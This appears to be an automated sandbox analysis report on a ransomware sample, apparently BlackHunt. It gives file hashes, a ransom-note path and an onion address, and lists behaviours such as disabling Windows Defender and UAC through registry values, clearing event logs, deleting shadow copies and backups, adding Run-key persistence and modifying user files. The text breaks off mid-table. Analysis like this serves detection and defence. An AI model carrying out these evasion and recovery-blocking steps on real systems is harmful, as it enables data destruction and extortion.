Analysis
-
max time kernel
52s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
26/12/2022, 10:59
Static task
static1
Behavioral task
behavioral1
Sample
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource
win10v2004-20220901-en
General
-
Target
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
-
Size
718KB
-
MD5
d7a24de75b761cb98f580dafda4ba885
-
SHA1
86dc51cfc817937f9525b8aa2fa71e918288a44d
-
SHA256
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f
-
SHA512
c3fd50a296b4d251a614816756eb17632779c0ef0e72826d9d276ccae8b1689ca0523a22027509ce20bf125f858f713b08967ae55501c457bc9d8fca956b0e9e
-
SSDEEP
12288:YuLRIEFPULfzlsH5HCSSv5zEWptZ/Vlt:YeRIEF6zlsu5AWptRVlt
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1612 fsutil.exe 2160 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1720 wevtutil.exe 2080 wevtutil.exe 2276 wevtutil.exe 2252 wevtutil.exe 2332 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1676 bcdedit.exe 924 bcdedit.exe 2236 bcdedit.exe 2224 bcdedit.exe -
pid Process 828 wbadmin.exe 2260 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\BackupOpen.tiff f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Users\Admin\Pictures\WatchRename.tiff f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Deletes itself 1 IoCs
pid Process 2168 cmd.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityService = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\G: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\J: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\K: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\N: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Q: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\W: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\U: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\F: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\H: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\L: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\X: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\V: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\T: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Y: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\O: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\P: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Z: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\B: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\I: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\M: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\R: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\S: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1444 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1680 vssadmin.exe 2356 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2296 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Black reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Black\DefaultIcon conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Black reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Black\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Black\DefaultIcon reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2544 mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeBackupPrivilege 1984 vssvc.exe Token: SeRestorePrivilege 1984 vssvc.exe Token: SeAuditPrivilege 1984 vssvc.exe Token: SeBackupPrivilege 288 wbengine.exe Token: SeRestorePrivilege 288 wbengine.exe Token: SeSecurityPrivilege 288 wbengine.exe Token: SeSecurityPrivilege 2080 wevtutil.exe Token: SeBackupPrivilege 2080 wevtutil.exe Token: SeSecurityPrivilege 1720 wevtutil.exe Token: SeBackupPrivilege 1720 wevtutil.exe Token: SeSecurityPrivilege 2252 wevtutil.exe Token: SeBackupPrivilege 2252 wevtutil.exe Token: SeSecurityPrivilege 2332 wevtutil.exe Token: SeSecurityPrivilege 2276 wevtutil.exe Token: SeBackupPrivilege 2332 wevtutil.exe Token: SeBackupPrivilege 2276 wevtutil.exe Token: SeDebugPrivilege 2296 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2040 wrote to memory of 1816 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 29 PID 2040 wrote to memory of 1816 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 29 PID 2040 wrote to memory of 1816 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 29 PID 2040 wrote to memory of 1816 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 29 PID 2040 wrote to memory of 1576 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 31 PID 2040 wrote to memory of 1576 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 31 PID 2040 wrote to memory of 1576 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 31 PID 2040 wrote to memory of 1576 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 31 PID 2040 wrote to memory of 1252 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 33 PID 2040 wrote to memory of 1252 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 33 PID 2040 wrote to memory of 1252 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 33 PID 2040 wrote to memory of 1252 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 33 PID 1816 wrote to memory of 1512 1816 cmd.exe 34 PID 1816 wrote to memory of 1512 1816 cmd.exe 34 PID 1816 wrote to memory of 1512 1816 cmd.exe 34 PID 2040 wrote to memory of 1612 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 127 PID 2040 wrote to memory of 1612 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 127 PID 2040 wrote to memory of 1612 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 127 PID 2040 wrote to memory of 1612 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 127 PID 1576 wrote to memory of 628 1576 Process not Found 109 PID 1576 wrote to memory of 628 1576 Process not Found 109 PID 1576 wrote to memory of 628 1576 Process not Found 109 PID 2040 wrote to memory of 964 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 75 PID 2040 wrote to memory of 964 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 75 PID 2040 wrote to memory of 964 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 75 PID 2040 wrote to memory of 964 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 75 PID 2040 wrote to memory of 892 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 39 PID 2040 wrote to memory of 892 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 39 PID 2040 wrote to memory of 892 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 39 PID 2040 wrote to memory of 892 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 39 PID 1252 wrote to memory of 332 1252 Process not Found 41 PID 1252 wrote to memory of 332 1252 Process not Found 41 PID 1252 wrote to memory of 332 1252 Process not Found 41 PID 2040 wrote to memory of 1404 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 119 PID 2040 wrote to memory of 1404 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 119 PID 2040 wrote to memory of 1404 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 119 PID 2040 wrote to memory of 1404 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 119 PID 964 wrote to memory of 608 964 reg.exe 87 PID 964 wrote to memory of 608 964 reg.exe 87 PID 964 wrote to memory of 608 964 reg.exe 87 PID 2040 wrote to memory of 1756 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 118 PID 2040 wrote to memory of 1756 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 118 PID 2040 wrote to memory of 1756 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 118 PID 2040 wrote to memory of 1756 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 118 PID 2040 wrote to memory of 1804 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 96 PID 2040 wrote to memory of 1804 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 96 PID 2040 wrote to memory of 1804 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 96 PID 2040 wrote to memory of 1804 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 96 PID 2040 wrote to memory of 1740 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 51 PID 2040 wrote to memory of 1740 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 51 PID 2040 wrote to memory of 1740 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 51 PID 2040 wrote to memory of 1740 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 51 PID 1612 wrote to memory of 1296 1612 fsutil.exe 52 PID 1612 wrote to memory of 1296 1612 fsutil.exe 52 PID 1612 wrote to memory of 1296 1612 fsutil.exe 52 PID 2040 wrote to memory of 1516 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 53 PID 2040 wrote to memory of 1516 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 53 PID 2040 wrote to memory of 1516 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 53 PID 2040 wrote to memory of 1516 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 53 PID 2040 wrote to memory of 1764 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 55 PID 2040 wrote to memory of 1764 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 55 PID 2040 wrote to memory of 1764 2040 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 55 PID 2040 wrote to memory of 1764 2040 